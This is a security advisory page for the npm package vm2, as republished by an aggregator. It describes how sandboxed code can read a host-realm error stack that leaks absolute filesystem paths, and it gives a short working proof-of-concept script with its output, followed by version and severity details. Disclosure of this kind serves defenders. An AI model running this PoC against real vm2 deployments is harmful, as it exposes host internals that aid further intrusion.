Disclosure summary
## Summary Attacker-controlled code can trigger a host-realm syntax error and read its stack through the vm2 bridge. Host-realm stack formatting bypasses the sandbox-side redaction, so the returned value exposes absolute paths from vm2, Node.js internals, and the embedding application. Default VM and NodeVM configurations are affected without requiring special options. ## PoC A default-configured `VM` runs attacker-supplied code. Calling `eval` with deliberately malformed source makes the host-side source transformer throw a `SyntaxError`; reading `.stack` on the caught error exposes the host call stack to the sandbox. ```js const { VM } = require("vm2"); console.log(new VM().run(` var s; try { eval("@@@ catch") } catch (e) { s = e.stack } s; `)); ``` ### Observed output ```text SyntaxError: Unexpected character '@' at makeNiceSyntaxError (.../lib/transformer.js:41:16) at transformer (.../lib/transformer.js:116:8) at Object.transformAndCheck (.../lib/vm.js:76:14) at Object.apply (.../lib/setup-sandbox.js:2585:16) at VM.run (.../lib/vm.js:529:16) ``` The stack string returned to the sandbox contains absolute host paths for `lib/transformer.js`, `lib/vm.js`, `lib/setup-sandbox.js`, N
Source-specific records & product guidance
Sources retain their own attribution and scoring. Follow the original record to confirm affected versions, fixed releases, and configuration conditions.
GitHub Reviewed Security Advisories · GHSA-x6m4-chr9-cg97
Open original source · Updated Oct 05, 2026
vm2 leaks absolute host filesystem paths to sandbox code via error stack formatting
Source severity: MEDIUM / 6.9
| Ecosystem | Package | Affected range | First patched |
|---|---|---|---|
| npm | vm2 | >= 3.11.0, | 3.11.7 |
Original records & references
- NIST NVD record
- CVE Program record
- github.com — Reviewed advisory
PUBLISHED 2026-10-05T18:35:31-04:00
MODIFIED 2026-10-05T18:35:34-04:00
INGESTED 2026-10-06T11:45:33-04:00